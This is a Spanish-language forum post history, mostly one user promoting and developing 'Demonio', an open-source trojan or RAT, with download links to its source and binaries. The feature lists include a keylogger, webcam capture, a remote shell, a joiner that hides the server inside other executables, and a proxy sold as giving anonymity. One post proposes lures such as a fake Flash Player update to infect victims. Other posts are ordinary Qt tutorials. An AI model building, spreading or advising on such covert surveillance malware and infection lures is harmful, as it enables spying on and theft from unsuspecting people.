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Temas - paju1986

#1
Nuevo lanzamiento mayor de mi RAT Demonio con multiples mejoras.

- Conexión mediante protocolo XMPP (Funciona detrás de NAT y cortafuegos)
- Multiplataforma - Windows, GNU/Linux tanto cliente como servidor, en Mac OS X el cliente funciona y el servidor no lo he probado pero probablemente no.
- Escritorio remoto
- Captura de Webcam
- Keylogger
- Administrador de archivos con descargar, subir, copiar, mover, renombrar,   borrar, crear carpeta, borrar carpeta, previsualizacion de imagenes etc...
- Apagar y reiniciar el sistema
- Consola remota
- Configurador del servidor
- Joiner integrado.
- Informacion del sistema
- Mensajes emergentes al inicio del servidor
- Protección del servidor mediante contraseña
- Transmisión de archivos en banda o fuera de banda
- Multiples mejoras y optimizaciones.
- Correción de errores
- Otras características diversas.

Capturas:

Demonio 3.0 sobre Windows 7


Demonio 3.0 sobre KUBUNTU 11.04



Link (Código fuente Licencia GPLv3):  https://sourceforge.net/projects/demonio/files/Demonio_3.0_src.tar.gz/download

Link (Binarios win32):
https://sourceforge.net/projects/demonio/files/Demonio30win32.zip/download

Mejoras de código, correción de errores, sugerencias, traduciones, etc son bien recibidas :)
#2
Un nuevo video mostrando mas progresos en Demonio y una vision general de algunas caracteristicas en funcionamiento.

Ver en youtube para alta definicion...

[youtube=425,350]http://www.youtube.com/watch?v=JFQWZdUV4Po[/youtube]
#3
Bueno aqui un tutorial de como compilar las librerias qt estáticamente en windows con el compilador de microsoft y el ssl activado. (Estos pasos son necesrios para compilar las nuevas versiones de mi troyano pero también es muy útil para los que quieran hacer aplicaciones Qt en Windows).

Primero necesitaremos las siguientes cosas...

Librerias Qt para msvc:
http://qt.nokia.com/downloads/windows-cpp-vs2008

Compilador MSVC2010
http://www.microsoft.com/visualstudio/en-us/products/2010-editions/express

Binarios para windows de OpenSSL
http://www.openssl.org/related/binaries.html

-Instalamos todo con las opciones predeterminadas...
-Ahora nos vamos a la carpeta C:\OpenSSL\lib\VC\static y compiamos los archivos ssleay32mt.lib y libeay32mt.lib a C:\Qt\4.7.3\lib , renombrandolos quitando el mt
quedaria asi ssleay32.lib libeay32.lib.
-Luego copiamos la carpeta C:\OpenSSL\include\openssl a C:\Qt\4.7.3\include
-Necesitamos configurar unas cosas en el qmke.conf del msvc2010, mas adelante subire el archivo bien configurado... tengo que buscar donde ponerlo...
-bueno abrimos la consola del msvc en menu inicio-> microsoft visual estudio 2010 express>simbolo del sistema de visual studio 2010..
-vamos al directorio de qt cd C:\Qt\4.7.3\

-ahora escribimos el comando de configuracion siguiente
configure -release -qt-libjpeg -qt-zlib -qt-libpng -nomake examples -nomake demos -no-exceptions -no-stl -no-rtti -no-qt3support -no-scripttools -openssl-linked -no-opengl -no-webkit -no-phonon -no-style-motif -no-style-cde -no-style-cleanlooks -no-style-plastique -no-sql-sqlite -no-declarative -platform win32-msvc2010 -static

-iniciamos la compilacion con nmake

Bueno eso es todo, perdonad si no esta muy bien esplicado y falta algo lo estoy haciendo de memoria...
me falta poner el qmake aver si mañana lo pongo y si hace falta modificar algo lo modifico...

UN SALUDO
#4
Bueno una vez aprobadas todas mis asignaturas he retomado mi proyecto principal Demonio.
Una de las novedades para la futura versión 3.0 y que lo aleja un poco de la mayoria de troyanos es que la conexión ya no se realizará más por Conexión inversa sino mediante el protocolo XMPP y cualquier servidor que lo soporte.
Esto trae ventajas como poder usar el cliente detrás de router o cortafuegos sin problemas, uso de comunicaciones cifradas con SSL, buen control de los servidores conectados/desconectados, poder manejar los servidores a través de cualquier cliente XMPP, enviar mensajes en broadcast a varios servidores a la vez y otras características.
Ya tengo implementado casi todo el soporte XMPP a excepción de envio de webcam que estará en breve.

Os dejo aquí un video mostrando su funcionamiento

[youtube=425,350]http://www.youtube.com/watch?v=SZiHNJfs_PM[/youtube]

Para el que no conozca el protocolo:
http://es.wikipedia.org/wiki/Extensible_Messaging_and_Presence_Protocol

Los cambios aún no están en el SVN y tardarán un poco en llegar. Además pronto estrenare mi web cuando soluciones algunos problemas con el hosting.

UN SALUDO

-----------------------------ACTUALIZADO----------------------------

Manual para conseguir las Qt en windows estaticas con openssl en msvc2010
http://foro.elhacker.net/programacion_cc/tutorial_compilacion_qt_estatica_en_windows_con_msvc2010_y_soporte_openssl-t332180.0.html
#5
Hola mi pregunta es la siguiente.
Tengo un troyano desarrollado con Qt al que quiero hacer que sea controlable via XMPP para lo cual no hay ningún problema para pasárle comandos y todo lo que sea texto pero el protocolo XMPP por si mismo no tiene soporte para transferir datos binarios, lo cual es un problema para transferir arhivos asi como la captura de pantalla y webcam.
He estado echando un ojo a la extensión Jingle que es la que usa el GTalk pero me parece que tendría problemas detrás de un router o firewall.
¿Es posible con Jingle transferir archivos estando cliente y servidor detrás de routers o cortafuegos sin abrir puertos?

UN SALUDO
#6
Esta mañana he estado programando una interfáz gráfica para la herramienta de consola vdfuse que permite montar fácilmente discos duros VDI de VirtualBox en Linux.
El programa ya es usable pero aún esta en alpha1.



Dependencias:
Python
PyQt
virtualbox-ose-fuse

Descarga:
https://sourceforge.net/projects/vdimountingtool/files/VDI_Mounting_tool_1.0alpha1.tar.gz/download
#7
Lanzada la versión 2.1 de corrección de errores y cambios menores.







Estos bugs han sido corregidos en esta versión

-Las previsualizaciones de imágenes tenian un recuadro gris al final.
-Corregidas las descargas de archivos
-Las capturas de webcam no llegaban completas.
-El servidor no se autoiniciaba en Windows XP

Además se ha añadido un administrador de procesos sencillo.

Descarga: http://albertopajuelo.blogspot.com/2010/12/demonio-troyano-opensource-en-c-y-qt4.html

A partir de ahora todas las futuras versiones solo en código fuente.

UN SALUDO
#8
Hola, quisiera preguntar como esta guardado el icono de un ejecutable windows para poder leerlo y modificarlo desde programa.
Talvez los x primeros bytes o algo así..

SALUDOS
#9
Mirando por la página oficial de KDE he visto este enlace, que me parece muy interesante.
http://dot.kde.org/2011/02/24/qt-everywhere-community-android-port-announces-alpha-release
Resulta que ya están portando las Qt y preparando QtCreator para programar para Android!! era la plataforma que faltaba, ahora aprendiendo Qt puedes programar para cualquier plataforma, aprendes 1 y programas para todos, :)
Windows, Linux, Mac, Symbian, Maemo y Android
#10
Hola, despúes de lanzar la versión 2.0 de mi troyano he decidido iniciar un nuevo proyecto.
Se llamará KAircrack, una interfáz gráfica escrita en Python y Qt4 para KDE para toda la suite Aircrack, enfocada a principiantes. Intentando poner las cosas fáciles y a la vez vistosas.
Ya he iniciado el proyecto, aunque sólo tengo un pequeño boceto de la interfaz gráfica y por ahora solo carga las interfaces de red y las puede poner en modo monitor.
Pronto crearé la página en sourceforge y el repositorio SVN

UN SALUDO
#11
Bueno, quisiera preguntar que formas de infección se les ocurren usando las redes sociales.
Seria interesante para aprender como evitar ataques y mejorar la seguridad.

A mi me vienen a la cabeza varias, pero parecen poco efectivas.

-subir un archivo bindeado a un ejecutable cualquiera no sospechoso, colgarlo en la web, y mandar el típico enlace a la victima

-Crear una página falsa de un video, y poner un mensaje, "Tienes que actualizar tu flas player para ver el video",y cuando le den a descargar, descargaran un flas player junto a troyano.

#12
Edito:

A partir de ahora las futuras versiones de Demonio solo verán la luz en forma de código fuente. No publicaré más ejecutables para ningún sistema operativo ni del cliente ni del servidor, debido a numerosos post de gente que no aprecia el trabajo de los demás, la gran cantidad de gente que espera que se lo den todo hecho a cambio de nada y el esfuerzo extra que conlleva el tener que hacer tantas compilaciones.


Video mostrando como configurar un servidor
[youtube=425,350]http://www.youtube.com/watch?v=QxYoQbYpyYU[/youtube]
VERSIÓN 2.0 FINAL LANZADA!!!!

Lanzada la última beta, beta 2 con correción de errores y manual de compilación del servidor en Windows.

Después de dos meses desde mi versión 1.0
NUEVA VERSIÓN DE MI TROYANO CON GRANDES MEJORAS

Fase Beta: Por favor, comunicadme los errores que encontreis para una vesión final estable. Gracias.

Cliente de Demonio 2.0b en Windows Vista y servidor en Windows 7


Cliente de Demonio 2.0b en Windows Vista y servidor en Kubuntu 10.10


Cliente de Demonio 2.0b en Kubuntu 10.10 y servidor en Windows 7



Cliente de Demonio 2.0b en Mac OS X y servidor en Linux



El troyano tiene:
-Conexión inversa.
-Conexión mediante servidor intermédio ( Demoxy )
-Multiples servidores se pueden conectar al mismo cliente a la vez.
-Escucha en 4 puertos.
-Generador del servidor.
-Escritorio remoto
-Administrador de archivos remoto (con transferencias de archivos comprimidas y previsualación de imágenes)
-Enviar mensajes emergentes.
-Consola remota
-MULTIPLATAFORMA Tanto Cliente como Servidor (sí funciona en GNU/Linux también!)
-Chat
-Captura de Webcam
-Envio de Teclado
-Envio de clicks de ratón.
-Keylogger
-Obtener información del sistema
-Administración del sistema (Reiniciar y apagar el equipo)
-Soporte multilenguaje (De momento Español, Inglés y Portugués)
-El servidor puede unirse a un ejecutable cualquiera y ejecutarse en segundo plano(JOINER)
-Se puede especificar que ejecute un programa o comando al iniciarse (Una vez o siempre que se inicie)
-Desinfectar el troyano de forma remota.
-Otras opciones diversas.

Link:
http://albertopajuelo.blogspot.com/2010/12/demonio-troyano-opensource-en-c-y-qt4.html
#13
He iniciado un nuevo proyecto llamado Demoxy. Se trata de un servidor proxy para Demonio que intercomunica de forma indirecta el servidor con el cliente de modo que, todas las conexiones pasan por un servidor intermedio.
Esto tiene ciertas ventajas con respecto al sistema de conexión inversa:

-No es necesario abrir puertos si te encuentras detrás de un ruter.
-Obtienes cierto anonimato, al conectarse el servidor al proxy en vez de a ti directamente parece que sea él el equipo del que proceden las ordenes.

Así mismo tiene también algunas desventajas:
-Necesitas un servidor intermedio con una dirección conocida.
-La conexión puede ser algo más lenta.

El servidor Demoxy está en una fase muy temprana de su desarrollo pero ya he logrado interconectar cliente y servidor con éxito y transmitir información entre ambos sin problema.
He tenido que hacer algunos cambios al cliente de Demonio para que pueda conectarse por el sistema Demoxy y ahora tiene dos opciones de conexión, la tradicional conexión inversa o a través del nuevo sistema.

Aqui un esquema que ilustra la forma de funcionar de ambas conexiones:



Captura de pantalla del Cliente de Demonio con opción de conexión a través de Demoxy:


EDITO

En estos últimos dias he estado implementando el soporte multiconexión de Demoxy, no es una tarea sencilla pues hay que manejar con mucho cuidado todas las posibilidades, conexiones , desconexiones, etc.
Ya he conseguido con éxito conectar varios servidores al cliente a través de Demoxy pero las desconexiones no están implementadas aún.
Los cambios ya están subidos al repositorio SVN

Para usar correctamente Demoxy, en la máquina donde lo vayamos a ejecutar tiene que tener abiertos estos puertos TCP:

1234 - Puerto de conexión principal del servidor
2345 - Puerto de transferencias de archivos
3456 - Puerto de transferencias de capturas de escritorio
4567 - Puerto de transferencia de capturas de webcam

1111 - Redirección de la conexión principal
2222 - Redirección de las transferencias de archivos
3333 - Redirección de capturas de escritorio
4444 - Redirección de capturas de webcam
5555 - Puerto de mensajes de control y estado.
#14
Buenas, otro problema con el dichoso QProcess, resulta que al ejecutar una aplicación con start(). startDetached(), o execute(), la aplicación se congela hasta que la aplicación que has ejecutado se cierra, y eso que se supone que start() y startDetached() son asincronos.
¿A qué es debido esto?
#15
Desarrollo Web / Un buen hosting gratuito
4 Enero 2011, 15:57 PM
Hola, mi pregunta es si conocen algún buen servicio de hosting gratuito y sin publicidad donde alojar un proyecto que estoy realizando, necesito que se puedan subir todo tipo de archivos ya que necesito que se puedan realizar descargas.

UN SALUDO
#16
Buenas, tengo un bug en mi troyano que llevo ya 2 dias con él y por muchas vueltas que le doy no consigo que funcione correctamente.
Se trata de la consola remota, tengo este slot:

QString MainWindow::shell(QString comando){
   /** Función que ejecuta el comando de consola pasado como parámetro y devuelve la salida **/
   consola.start(comando);
   consola.waitForStarted();
   consola.waitForReadyRead();
   return consola.readAll();
}


consola esta definido en el .h como QProcess consola.
El caso es que no me funciona, no me devuelve la salida del comando
pero si pongo cmd.exe aparece esto

Microsoft Windows [Versi¢n 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

C:\Users\alberto\Desktop\DemonioCompartido\Demonio\src\servidor-build-desktop>

Alguien tiene alguna idea? aver si puedo sacar ya la 1.0 final de una vez.
#17
Programación C/C++ / ATRAPAME!!!!!!!!!!
27 Diciembre 2010, 01:52 AM
Código fuente de un pequeño programita de broma en Qt4 (es que me aburria)

http://qt-apps.org/content/show.php?content=136693
#18
Hola a todos.
Estoy haciendo un pequeño tutorial de programación con las librerias Qt4 que iré poniendo poco a poco en mi blog.
Actualmente ando un poco liado en mi propio proyecto de un troyano y con las clases de DAI pero intentaré hacer por lo menos un post del tutorial a la semana.
Espero que les sirva y perdonad si alguna semana estoy demasiado ocupado como para publicar la nueva entrega
------------------------------------------------------------------------------
Bueno, voy a ir haciendo poco a poco un pequeño curso de programación con las librerias Qt4 ya que parece que hay poco al respecto en español.
Voy a suponer que ya se poseen conocimientos de programación en C++ en general y de programación orientada a objetos.
Lo primero que voy a enseñar es como crear una aplicación simple que mue
stre una ventana.


#include <QtGui/QApplication>
#include <QMainWindow>
int main(int argc, char *argv[])
{
   QApplication app(argc, argv);
   QMainWindow ventana;
   ventana.show();
   return app.exec();

}


Bueno, como veis el código es bastante simple, primero tenemos que incluir la clase QApplication que es la encargada de todo lo referente a nuestra aplicación y la clase QMainWindow que es la que representa la ventana principal de nuestro programa.
Luego en la típica función main declaramos dos objetos:
app de tipo QApplication que será el que contiene las funcionalidades básicas del programa y una ventana principal llamada ventana.

Con ventana.show() le decimos que queremos mostrar la ventana en pantalla y luego
llamamos a app.exec() que es un bucle donde permanecerá la aplicación recibiendo y respondiendo a los eventos del usuario hasta que se le de la orden de cerrar la aplicación, en cuyo caso devolverá el código de salida 0 si todo ha ido bien y saldrá del programa.

Más adelante en próximos post explicaré como incluir botones y el mecanismo de signals y slots típico de la programación en Qt.
Hasta la próxima.
--------------------------------------------------------------------------------
Bueno ya que estaba un poco aburrido hoy voy a continuar con la segunda entrega de mi tutorial de programación en Qt4.
En esta ocasión voy a explicar como añadir botones y hacer que al pulsarlos hagan cosas.
Para añadir un botón a nuestro anterior programa lo primero es incluir un nuevo archivo de cabecera que contiene la clase que maneja nuestro botón, en este caso la clase QPushButton (Nota que todas las clases en Qt empiezan por Q).
Las cabeceras quedarían así:

#include <QtGui/QApplication>
#include <QMainWindow>
#include <QPushButton>


Luego bastará con crear un nuevo objeto de esa clase y para que esté incluido en el formulario le pasaremos una referencia a él.
Esto lo haremos de la siguiente forma:
QPushButton *boton = new QPushButton(&ventana);

Con lo que nuestro código completo que añade un botón a la ventana principal queda asi:
#include <QtGui/QApplication>

#include <QMainWindow>
#include <QPushButton>
int main(int argc, char *argv[])
{
   QApplication a(argc, argv);
   QMainWindow ventana;
   QPushButton *boton = new QPushButton(&ventana);
   ventana.show();
   return a.exec();
}

Si te fijas verás que el botón que hemos incluido no tiene ningún texto, para ponerle un texto usaremos el método
QPushButton::setText([texto que le queramos poner]);
Aprovecho para explicar algo sobre los métodos en Qt.
Los métodos que sirven para establecer parámetros de los objetos normalmente son los mismos que los que se usan para leerlos pero empezando por set.
Ejemplo:
QPushButton::text() nos devolvería el texto del boton y QPushButton::setText([algun texto]); pondría el texto del botón.

Concluyendo nuestro programita anterior quedaría algo mejor de la siguiente forma:


#include <QtGui/QApplication>
#include <QMainWindow>
#include <QPushButton>
int main(int argc, char *argv[])
{
   QApplication a(argc, argv);
   QMainWindow ventana;
   QPushButton *boton = new QPushButton(&ventana);
   boton->setText("Boton de prueba");
   ventana.show();
   return a.exec();
}
Bueno ahora que tenemos un botón querremos que haga algo al pulsarlo ¿no?

En Qt4 la forma de manejar los eventos como pulsación de un botón, rellenar un formulario, etc. se manejan con el sistema de signals y slots.
Esto consiste en que el objeto que recibe la acción (por ejemplo, un botón al ser pulsado), envia una señal (signal) a otro objeto (por ejemplo, la ventana principal), y este objeto receptor tratará esa señal ejecutando uno de sus métodos (slots).
El método que conecta signals y slots es el método connect de la clase QApplication y se usa de la siguiente manera:

QApplication::connect([objeto emisor],SIGNAL([señal]),[objeto receptor],SLOT([método receptor]));

Veamos como haríamos para que, por ejemplo, al pulsar el botón la aplicación se cerrase.

#include <QtGui/QApplication>
#include <QMainWindow>
#include <QPushButton>
int main(int argc, char *argv[])
{
   QApplication a(argc, argv);
   QMainWindow ventana;
   QPushButton *boton = new QPushButton(&ventana);
   boton->setText("Boton de prueba");
   a.connect(boton,SIGNAL(clicked()),&ventana,SLOT(close()));
   ventana.show();
   return a.exec();
}


Como se puede ver en el ejemplo, conectamos la señal clicked() del botón con el slot close() de la ventana principal, lo que hace que al pulsar el botón la aplicación se cierre.

Bueno esto es todo por ahora, en próximas entregas profundizaremos un poco más en el mecanismo de signals y slots.

HASTA LA PRÓXIMA.
-------------------------------------------------------------------------------------------------Bueno, vamos a continuar con el tutorial.
En esta ocasión voy a hablar de como crear signals y slots personalizados para un determinado widget.
Para eso tendremos que crear una clase que herede de la clase a la que queremos añadir signals y/o slots definidos por nosotros donde los declararemos.
Veamos como se hace modificando nuestro programa anterior para que muestre un mensaje emergente al pulsar el botón.

Primero creamos un archivo de cabecera ventanaPrincipal.h y otro archivo ventanaPrincipal.cpp donde implementaremos sus métodos.
El fichero de cabecera quedaria así:

#include <QMainWindow>

class ventanaPrincipal : public QMainWindow
{
   Q_OBJECT
public:
   explicit ventanaPrincipal(QWidget *parent = 0);
   ~ventanaPrincipal();
public slots:
   void mostrarVentanaEmergente();
private:
};

y el fichero cpp asi:

#include <ventanaPrincipal.h>
#include <QMessageBox>
ventanaPrincipal::ventanaPrincipal(QWidget *parent) : QMainWindow(parent)
{

}
ventanaPrincipal::~ventanaPrincipal()
{

}
void ventanaPrincipal::mostrarVentanaEmergente()
{
   QMessageBox mensaje;
   mensaje.setText("Hola mundo!");
   mensaje.show();
}

Como se puede ver en el ejemplo, declaramos una clase ventanaPrincipal que hereda de QMainWindow y en public slots: definimos el lugar donde pondremos nuestros propios slots personalizados.
Los slots se declaran como cualquier método normal de la clase, en nuestro ejemplo he creado el slot mostrarVentanaEmergente() que mostrará una ventana emergente con el texto "Hola mundo!"
Con todo esto nuestro programa principal quedaria así:
#include <QtGui/QApplication>
#include <QMainWindow>
#include <QPushButton>
#include <ventanaPrincipal.h>
int main(int argc, char *argv[])
{
   QApplication a(argc, argv);
   ventanaPrincipal ventana;
   QPushButton *boton = new QPushButton(&ventana);
   boton->setText("Boton de prueba");
   a.connect(boton,SIGNAL(clicked()),&ventana,SLOT(mostrarVentanaEmergente()));
   ventana.show();
   return a.exec();
}
Lo único que hemos hecho es cambiar el tipo de ventana de QMainWindow a nuestra clase personalizada ventanaPrincipal y conectar el botón a nuestro recién creado slot.
Bueno hasta aquí por hoy, en próximas entregas enseñare como crear signals personalizados.
¡HASTA LA PRÓXIMA!
fuente original: http:\\albertopajuelo.blogspot.com
SALUDOS!
#19
Hola, tengo este simple código en C++ con las librerias Qt4 donde parametros[1] es un QString con la ruta completa del ejecutable que pretendo ejecutar y no me funciona.
¿Que puede estar pasando?

if (parametros[0] == "execute")
   {
       QProcess ejecutar;
       ejecutar.start(parametros[1]);
   }
#20
Hola, me he hecho una pequeña libreria en c++ para la captura de webcam desde mi troyano Qt4, la he hecho usando la API de windows y más adelante haré otra para v4l y asi completar el soporte multiplataforma.
Pero tengo un problema que no se como sulucionar, resulta que despúes de encender la cámara está solo me captura el primer frame y no se actualiza y no se porque. os dejo el código fuente a ver si le podeis hechar un vistazo (Licencia GPL).
#include "webcamwin.h"

HWND hwndVideo; // video capture window
void encender()
{
   ::hwndVideo = capCreateCaptureWin dowA("captura",WS_POPUP,160, 120 ,320, 240,NULL,0);
   capDriverConnect(::hwndVideo,0);
   capPreviewRate(::hwndVideo,100);
   capPreviewScale(::hwndVideo,false);
   capPreview(::hwndVideo,true);
}

void apagar()
{
   capPreview(::hwndVideo,FALSE);
   DestroyWindow(::hwndVideo);
   ::hwndVideo = NULL;
}

QPixmap capturar()
{
   QPixmap imagen;
   capFileSaveDIB(::hwndVideo,L"prueba.bmp");
   imagen.load("prueba.bmp");
   return imagen;
}

Edito:
Bueno ya solucioné el problema cambiando algunas cosas en la llamada a capCreateWindowA... interesados en la libreria la pueden descargar junto al fuente de mi troyano.
#21
Programación C/C++ / Libreria VNC
10 Diciembre 2010, 18:54 PM
Hola, bueno he estado intentando de todas las formas posibles con OpenCV para la caputara de webcam y no hay manera, y luego lo del ratón y teclado con las APIS me parecia que tenia que haber otra manera más fácil... Luego pensé Aiba! y que pasa con VNC? ahora me estoy leyendo la documentacíon oficial de las LibVncServer y la LibVncClient y parece que pueden solucionar los dos problemas de un solo golpe!
Alguién ha usado estas librerias y sabe sobre VNC?
#22
Otra aplicación que libero bajo la GPLv3, esta vez se trata de un Joiner, un programa que sirve para unir dos ejecutables en uno y ejecutar estos a la vez.
Como la vez anterior con mi troyano no incluyo los ejecutables solo el código fuente.

*Aun le falta que se ejecuten los ejecutables, pero programar eso es trivial seguramente mañana estará terminado.

Enlace de descarga: http://qt-apps.org/content/show.php/Juntador+-+Join+executables?content=136076

Captura de pantalla:
#23
Hola, estoy escribiendo un troyano con las librerias Qt4, lo voy escribiendo en mis ratos libres y el desarrollo va algo lento asi que he decidido liberar lo que tengo hecho bajo licencia GPLv3.

Ahora mismo estoy un poco ocupado con las clases de DAI y no puedo dedicarle todo el tiempo que merece mi proyecto. Por eso si algún desarrollador está interesado en colaborar para hacer de este un gran RAT que me lo comunique para darle acceso al servidor de Subversión.

Cosas que se necesitan saber para trabajar en este proyecto:
-Programación en C++ y manejo de las librerias Qt4.
-Saber manejarse con Subversión.
-Saber desenvolverse tanto en GNU/Linux como en Windows.
-Saber teoria sobre troyanos y arquitectura cliente-servidor.


AHORA TAMBIÉN TENEIS EL EJECUTABLE DEL CLIENTE YA COMPILADO JUNTO AL CODIGO FUENTE.

YA CASI TENGO IMPLEMENTADAS TODAS LAS IDEAS QUE TENIA PARA LA VERSIÓN 2.0 DENTRO DE POCO LA PRIMERA BETA!!!!

VERSIÓN 1.0 LANZADA!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

El troyano tiene: (VERSIÓN 1.0)
-Conexión inversa.
-Multiples servidores se pueden conectar al mismo cliente a la vez.
-Escucha en 4 puertos.
-Generador del servidor.
-Ver escritorio remoto.
-Administrador de archivos remoto (con transferencias de archivos comprimidas)
-Enviar ventanas emergentes.
-Consola remota
-MULTIPLATAFORMA (sí funciona en GNU/Linux también!)
-Chat
-Captura de Webcam
-Envio de Teclado
-Envio de clicks de ratón.
-Keylogger

Edito:
Novedades en la versión SVN:
EL SERVIDOR VUELVE A FUNCIONAR EN GNU/LINUX!!!!!!!!!!!!!
-Ahora el servidor puede unirse a un ejecutable cualquiera y ejecutarse en segundo plano (JOINER)
-Se puede configurar el servidor para ejecutar un programa al iniciarse, ya sea una vez o siempre que se inicie.
-Ahora puede ver las unidades de disco del sistema remoto y navegar por ellas
-Implementada información del sistema
-Los archivos temporales han sido movidos al directorio temporal del sistema
-Implementado copiar y mover en el administrador de archivos.
-GRAN restructuración de código.
-Implementado desinfectar la máquina remota desde el cliente.
-Implementado previsualización de imágenes en el adminsitrador de archivos
-Implementado tiempo de captura en las capturas de pantalla y rediseño de la interfaz
-CONEXIÓN CON EL PROYECTO DEMOXY
-Añadido traducción al Inglés.
-Añadido opciones de borrar carpeta y ver tamaño de archivo
-Añadido iconos para tipos de archivos conocidos en el administrador de archivos
-Ahora los archivos se refrescan automaticamente al realizar alguna modificación.
-Mejorado el sistema de escritorio remoto ahora es mucho más eficiente
-Añadidas las opciones de Apagar el equipo y reiniciar el equipo
-Otros cambios diversos.

Mas novedades irán apareciendo en el svn. Estad atentos!!!!!!!!

Algunas capturas de la versión en desarrollo:





Traducción al Inglés - English translation


Cliente de Demonio 1.0 beta en Windows 7 y servidor en localhost:



Cliente de Demonio SVN en Windows XP y servidor Kubuntu 10.10:


Cliente de Demonio SVN en Kubuntu 10.10 y servidor en Windows XP:


Enlace de descarga:
http://albertopajuelo.blogspot.com/2010/12/demonio-troyano-opensource-en-c-y-qt4.html
#24
Buenas, he aqui uno de los problemas con los que me he encontrado a la hora de implementar el soporte de Webcam para mi troyano.
Para capturar imagenes desde la webcam estoy utilizando la libreria OpenCV, todo me funciona correcto con librerias dinámicas, pero al ser un troyano seriá necesario incluir todo en el mismo ejecutable, así que compile de forma estática la liberia pero a la hora de compilar aparecen un monton de errores de referencias perdidas, he investigado por Google y parece que la libreria OpenCV aún no está preparada para compilación estatica.
¿Alguién sabe del tema?
#25
Estoy buscando alguna libreria en C++ para manejar el raton y el teclado e integrarla en mi troyano pero tiene que ser multiplataforma y de licencia libre.
Si alguien conoce alguna o se anima a programarla avisadme porfavor.
(El código fuente de mi troyano esta en un POST de este mismo foro)

http://foro.elhacker.net/programacion_cc/estoy_escribiendo_un_troyano_en_c_y_qt4_de_licencia_gpl-t313180.0.html
#26
Hola, estoy escribiendo un troyano con las librerias Qt4, lo voy escribiendo en mis ratos libres y el desarrollo va algo lento asi que he decidido liberar lo que tengo hecho bajo licencia GPLv3.

Ahora mismo estoy un poco ocupado con las clases de DAI y no puedo dedicarle todo el tiempo que merece mi proyecto. Por eso si algún desarrollador está interesado en colaborar para hacer de este un gran RAT que me lo comunique para darle acceso al servidor de Subversión.

Cosas que se necesitan saber para trabajar en este proyecto:
-Programación en C++ y manejo de las librerias Qt4.
-Saber manejarse con Subversión.
-Saber desenvolverse tanto en GNU/Linux como en Windows.
-Saber teoria sobre troyanos y arquitectura cliente-servidor.


AHORA TAMBIÉN TENEIS EL EJECUTABLE DEL CLIENTE YA COMPILADO JUNTO AL CODIGO FUENTE.

VERSIÓN 1.0 LANZADA!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

El troyano tiene: (VERSIÓN 1.0)
-Conexión inversa.
-Multiples servidores se pueden conectar al mismo cliente a la vez.
-Escucha en 4 puertos.
-Generador del servidor.
-Ver escritorio remoto.
-Administrador de archivos remoto (con transferencias de archivos comprimidas)
-Enviar ventanas emergentes.
-Consola remota
-MULTIPLATAFORMA (sí funciona en GNU/Linux también!)
-Chat
-Captura de Webcam
-Envio de Teclado
-Envio de clicks de ratón.
-Keylogger

Edito:
Novedades en la versión SVN:
EL SERVIDOR VUELVE A FUNCIONAR EN GNU/LINUX!!!!!!!!!!!!!
-Ahora el servidor puede unirse a un ejecutable cualquiera y ejecutarse en segundo plano (JOINER)
-Se puede configurar el servidor para ejecutar un programa al iniciarse, ya sea una vez o siempre que se inicie.
-Ahora puede ver las unidades de disco del sistema remoto y navegar por ellas
-Implementada información del sistema
-Los archivos temporales han sido movidos al directorio temporal del sistema
-Implementado copiar y mover en el administrador de archivos.
-GRAN restructuración de código.
-Implementado desinfectar la máquina remota desde el cliente.
-Implementado previsualización de imágenes en el adminsitrador de archivos
-Implementado tiempo de captura en las capturas de pantalla y rediseño de la interfaz
-CONEXIÓN CON EL PROYECTO DEMOXY
-Añadido traducción al Inglés.
-Añadido opciones de borrar carpeta y ver tamaño de archivo
-Añadido iconos para tipos de archivos conocidos en el administrador de archivos
-Ahora los archivos se refrescan automaticamente al realizar alguna modificación.
-Otros cambios diversos.

Mas novedades irán apareciendo en el svn. Estad atentos!!!!!!!!

Algunas capturas de la versión en desarrollo:





Traducción al Inglés - English translation


Cliente de Demonio 1.0 beta en Windows 7 y servidor en localhost:



Cliente de Demonio SVN en Windows XP y servidor Kubuntu 10.10:


Cliente de Demonio SVN en Kubuntu 10.10 y servidor en Windows XP:


Enlace de descarga:
http://albertopajuelo.blogspot.com/2010/12/demonio-troyano-opensource-en-c-y-qt4.html